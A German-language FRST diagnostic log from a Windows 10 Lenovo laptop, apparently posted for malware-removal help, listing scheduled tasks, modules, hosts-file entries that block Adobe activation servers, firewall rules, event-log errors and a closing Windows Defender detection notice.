{844ACD9E-BD7D-474F-8117-6D90173B21F2} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe Task: {8717EEF6-E532-4C6C-A532-CB26B350F2BF} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe Task: {8BD97214-F360-4555-B780-8E98A751D90A} - System32\Tasks\RtHDVBg_Dolby => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-10-01] (Realtek Semiconductor) Task: {8E22DE0B-F51D-4116-A8E2-03F2E91E1B28} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-10-01] (Realtek Semiconductor) Task: {985B667F-5809-47FB-B953-0CE916B386C7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {99265848-09F9-4807-89BC-ADE8DED3AFE3} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => Sc.exe START ImControllerService Task: {9B828E07-B816-4CD7-ADFA-1B5F9AD26442} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG Task: {9FB0B6E1-8348-4D3C-8907-4EDA7C5340A5} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {AE4B9823-9A54-4135-ABA7-B40C512E17A4} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-02-23] (Dropbox, Inc.) 
Task: {AE8D0CF6-2EF8-4189-BE67-995466304543} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe Task: {B6057C25-D59A-4344-A92A-B2034A515A19} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {B977E6C5-B009-48BD-B2AA-DC32B1E763AF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe Task: {B9F5F195-100B-41F3-BF0C-58B05B9B4103} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-02-19] (Intel(R) Corporation) Task: {BB42B4FB-073D-45F9-A76B-1212343A6AC1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> Keine Datei <==== ACHTUNG Task: {C2546E5D-79C2-4541-9E39-E0D6ED7AAE71} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Keine Datei <==== ACHTUNG Task: {C5D88ED0-F2CC-4454-8C31-965F8FC0C2A0} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe Task: {C752F5F1-D27B-4954-AA2B-9C4E4500D357} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {CA3B4A87-99F8-4810-BF19-A18F1B3107DB} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {D35C04F6-8F88-4A03-8BA2-89159AC22A37} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Keine Datei <==== ACHTUNG Task: {D56A0AC7-5318-4063-BBFA-A316BB8376D3} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-06-02] (Lenovo) Task: {DFD6BAEA-857D-47A9-9549-63E9AC2DC5B7} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe Task: {E02EBA99-651C-441A-A6DF-AEF563A9822D} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-06-02] () Task: 
{E0FFE99A-6A7C-442F-AB93-8EB9D8109C61} - System32\Tasks\Lenovo\Lenovo Settings Power => Rundll32.exe "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.dll",PwrMgrBkGndMonitor Task: {E199183F-6CCA-42E0-8834-0B9241326AB6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {F6305F54-EAFE-4AFF-9F0F-1B9D0630DE8D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {FA52DB1A-7F2B-4BF0-81D5-DC5856B6BFE6} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\WINDOWS\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)" Task: {FCF54764-174B-4899-B8D3-E365E576C6F3} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\c9012fed-5674-4317-91c3-83c569e66191 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-06-05] (Lenovo Group Limited) Task: {FE295463-A538-4E94-B586-9A9AEF092B99} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe ==================== Verknüpfungen & WMI ======================== (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) 
ShortcutWithArgument: C:\Users\ararat\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\6fa8d4dcdac59e60\Chromium.lnk -> C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (SRWare) -> --profile-directory=Default

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-02-11 20:38 - 2015-12-22 12:38 - 03180176 _____ () C:\Windows\system32\nvwmi64.exe
2016-02-15 22:01 - 2016-02-15 22:01 - 00031256 _____ () C:\WINDOWS\System32\us008lm.dll
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-20 16:50 - 2017-04-28 08:03 - 00213880 _____ () C:\Program Files (x86)\ThinkPad\Utilities\GR\PWMRT64V.DLL
2016-02-13 16:12 - 2016-02-02 16:37 - 02570752 _____ () C:\Program Files\SRWare Iron (64-Bit)\libglesv2.dll
2016-02-13 16:12 - 2016-02-02 16:37 - 00087552 _____ () C:\Program Files\SRWare Iron (64-Bit)\libegl.dll
2016-04-21 18:33 - 2013-12-22 08:22 - 00047496 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\QtSolutions_Service-head.dll
2016-04-21 18:33 - 2013-12-22 08:22 - 00104328 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\qjson0.dll
2016-02-25 21:38 - 2016-02-25 21:38 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\hyoidxux.sys:changelist [782]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2016-02-23 23:08 - 2016-07-30 18:02 - 00003191 _____ C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 activate.adobe.com
127.0.0.1 adobe.activate.com
127.0.0.1 activate.adobe.de
127.0.0.1 adobeereg.com
127.0.0.1 hl2rcv.adobe.com
127.0.0.1 3dns.adobe.com
127.0.0.1 3dns-1.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-4.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-1.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 adobe-dns-4.adobe.com
127.0.0.1 adobe-dns-5.adobe.com
127.0.0.1 activate-sea.adobe.de
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 activate-sjc0.adobe.de
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 activate.wip.adobe.com
127.0.0.1 activate.wip1.adobe.com
127.0.0.1 activate.wip2.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 activate.wip4.adobe.com
127.0.0.1 activate.wip3.adobe.de
127.0.0.1 practivate.adobe
127.0.0.1 practivate.adobe.de
127.0.0.1 practivate.adobe.com

Da befinden sich 48 zusätzliche Einträge.

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKLM\...\StartupApproved\StartupFolder: => "CodeMeter Control Center.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Netzwerk Server.lnk"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "NvBackend"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKLM\...\StartupApproved\Run32: => "IMSS"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{653565DE-9382-4D0D-85FF-4568B9133C1E}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe FirewallRules: [UDP Query User{628701B0-B712-431B-9393-9A95979EDCD3}C:\program files\srware iron (64-bit)\chrome.exe] => (Block) C:\program files\srware iron (64-bit)\chrome.exe FirewallRules: [TCP Query User{F7353599-717C-48F1-A7C4-29EA353FB9EA}C:\program files\srware iron (64-bit)\chrome.exe] => (Block) C:\program files\srware iron (64-bit)\chrome.exe FirewallRules: [{792A37F2-D689-4DD6-8D2C-FBA7331805F4}] => (Block) C:\program files\autodesk\3ds max 2015\3dsmax.exe FirewallRules: [{B791C512-BFC4-4770-9ECA-470BCC2A7DEE}] => (Block) C:\program files\autodesk\3ds max 2015\3dsmax.exe FirewallRules: [UDP Query User{8B73BCF1-A27F-46FA-8493-FCAEC1304E80}C:\program files\autodesk\3ds max 2015\3dsmax.exe] => (Allow) C:\program files\autodesk\3ds max 2015\3dsmax.exe FirewallRules: [TCP Query User{89173555-CB79-4375-8B44-776AD246B48C}C:\program files\autodesk\3ds max 2015\3dsmax.exe] => (Allow) C:\program files\autodesk\3ds max 2015\3dsmax.exe FirewallRules: [{62792125-6600-4F0D-9E98-36AFFE88A65C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{0A1FDF08-88CB-46A6-A831-2C99CBD8CB46}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{DF579F84-82D2-4D87-AE46-8C50FEEADB09}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{E5FE0167-99D3-4174-B1EC-B4885B8F4350}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [TCP Query User{2F4AFE87-B42B-45E3-B554-1995154ED7F8}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{DA37DC8E-E6FD-4F94-8205-AD8E720DF402}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe FirewallRules: [{AA8607DB-7DDC-461E-A485-928A060249F7}] => (Allow) C:\Program 
Files\GRAPHISOFT\ArchiCAD 18\ArchiCAD.exe FirewallRules: [{88856880-8A4A-42AB-9D2E-30C799D2B9F1}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\ArchiCAD.exe FirewallRules: [{39C35EB4-AA50-466F-A4BF-3C59A7E3BA8C}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\CineRender\CineRender 64bit.exe FirewallRules: [{7926FF23-E4D1-454F-B88A-87D18A9AB988}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\CineRender\CineRender 64bit.exe FirewallRules: [{E9100150-1A9E-4657-BC50-714390476085}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{9CEAA83C-8F23-4BDB-BAFF-C8C84FEE4D81}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [{CC90D6FE-8983-4889-9794-A14326787265}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe FirewallRules: [TCP Query User{FB492D07-7354-45CC-ADD9-E6AE207F9190}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{CCD8C032-9093-4911-BCD8-02465C75B061}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe FirewallRules: [{EA429A43-2FEC-4D6F-826C-06F17CCC0613}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe FirewallRules: [{20E60939-1FF9-49B8-A516-9542A3F2C33E}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe FirewallRules: [{28C60E63-767D-4518-A3D4-6123F4316D49}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe FirewallRules: [{9BF832A9-551A-4DF6-99CA-5002606D4197}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe FirewallRules: [{2D2FEEFE-0D55-4D31-BC23-46F39EBD0F58}] => (Allow) C:\Program Files\Chaos Group\V-Ray\3dsmax 2015 for x64\vrlservice.exe FirewallRules: [{6353C606-2B4C-4737-BF11-4B5E18EBAF06}] => (Allow) 
C:\Program Files\Chaos Group\V-Ray\3dsmax 2015 for x64\vrlservice.exe FirewallRules: [TCP Query User{E451C298-1596-4AD5-A4EE-B7F4F17C1071}C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe] => (Block) C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe FirewallRules: [UDP Query User{5D6F2A66-AF06-4682-A369-62305BA12C39}C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe] => (Block) C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe FirewallRules: [TCP Query User{1ACF387C-2C3D-49B0-B24B-F58F47F86A71}C:\program files\graphisoft\archicad 18\archicad.exe] => (Block) C:\program files\graphisoft\archicad 18\archicad.exe FirewallRules: [UDP Query User{5CF615D2-8196-4AEF-9F97-12FED9AA7D13}C:\program files\graphisoft\archicad 18\archicad.exe] => (Block) C:\program files\graphisoft\archicad 18\archicad.exe FirewallRules: [{1D081E8A-DD53-4FDB-B585-23585FFA1137}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{65AAA8A3-F502-43D1-8931-540CB11FCF00}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server ==================== Wiederherstellungspunkte ========================= 14-06-2017 20:31:05 Windows Update 20-06-2017 21:19:32 Windows Update ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (06/29/2017 10:07:42 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: WSCommCntr4.exe, Version: 4.0.3.0, Zeitstempel: 0x52e23951 Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.0, Zeitstempel: 
0xb79b6ddb Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000003bbef ID des fehlerhaften Prozesses: 0xa2c Startzeit der fehlerhaften Anwendung: 0x01d2f1135d2f73eb Pfad der fehlerhaften Anwendung: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\Lib\WSCommCntr4.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll Berichtskennung: bd38a6ca-5ed4-42f0-be88-1ecd6890a6e2 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (06/28/2017 07:04:24 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: MsMpEng.exe, Version: 4.11.15063.0, Zeitstempel: 0x418969b3 Name des fehlerhaften Moduls: offreg.dll_unloaded, Version: 10.0.15063.168, Zeitstempel: 0xfaed1333 Ausnahmecode: 0xc0000005 Fehleroffset: 0x0000000000001440 ID des fehlerhaften Prozesses: 0x1088 Startzeit der fehlerhaften Anwendung: 0x01d2e54a788d7120 Pfad der fehlerhaften Anwendung: C:\Program Files\Windows Defender\MsMpEng.exe Pfad des fehlerhaften Moduls: offreg.dll Berichtskennung: 0a8d723a-7e31-4589-8105-733ccd81828d Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (06/27/2017 09:01:16 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: WSCommCntr4.exe, Version: 4.0.3.0, Zeitstempel: 0x52e23951 Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.0, Zeitstempel: 0xb79b6ddb Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000001445d ID des fehlerhaften Prozesses: 0x2f0 Startzeit der fehlerhaften Anwendung: 0x01d2ef77c053cd42 Pfad der fehlerhaften Anwendung: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\Lib\WSCommCntr4.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll Berichtskennung: 903741eb-1643-4d3e-8a22-1f471438ecab Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (06/15/2017 07:05:58 PM) (Source: 
Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook) Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2144927148. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“. Error: (06/14/2017 10:09:53 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook) Description: Bei der Aktivierung der App „E046963F.LenovoCompanion_k1h2ywk1493x8!App“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“. Error: (06/14/2017 08:33:49 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode. Error: (06/14/2017 08:21:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook) Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2144927148. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“. Error: (06/12/2017 09:55:52 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook) Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2147023170. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“. Error: (06/12/2017 09:55:52 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ararat-notebook) Description: Bei der Aktivierung der App „Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI“ ist folgender Fehler aufgetreten: -2144927148. 
Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“. Error: (06/08/2017 09:08:30 AM) (Source: MSDTC Client 2) (EventID: 4104) (User: ) Description: Fehler beim Abrufen des Status des Clusterknotens: .Zurückgegebener Fehlercode: 0x8007085A Systemfehler: ============= Error: (07/02/2017 08:56:05 PM) (Source: Disk) (EventID: 11) (User: ) Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden. Error: (07/02/2017 08:18:09 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (07/02/2017 08:18:09 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. 
Error: (07/02/2017 08:17:58 PM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. Error: (07/02/2017 08:17:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (07/02/2017 07:50:03 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (07/02/2017 07:50:03 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. 
Error: (07/02/2017 07:50:00 PM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden. Error: (07/02/2017 07:49:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (07/02/2017 07:42:23 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. CodeIntegrity: =================================== Date: 2017-06-28 19:04:24.848 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system. Date: 2017-06-28 19:04:24.794 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system. 
Date: 2017-06-18 19:26:08.764 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-06-13 08:51:15.282 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-5500U CPU @ 2.40GHz Prozentuale Nutzung des RAM: 19% Installierter physikalischer RAM: 16079.95 MB Verfügbarer physikalischer RAM: 12941.73 MB Summe virtueller Speicher: 32463.95 MB Verfügbarer virtueller Speicher: 29419.4 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:236.7 GB) (Free:75.98 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 5346E13D) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=236.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=889 MB) - (Type=27) ==================== Ende von Addition.txt ============================ Code:
Ebene Datum und Uhrzeit Quelle Ereignis-ID Aufgabenkategorie
Warnung 02.07.2017 20:19:09 Microsoft-Windows-Windows Defender 1116 Keine
"Von Windows Defender Antivirus wurde Schadsoftware oder andere potenziell unerwünschte Software erkannt.
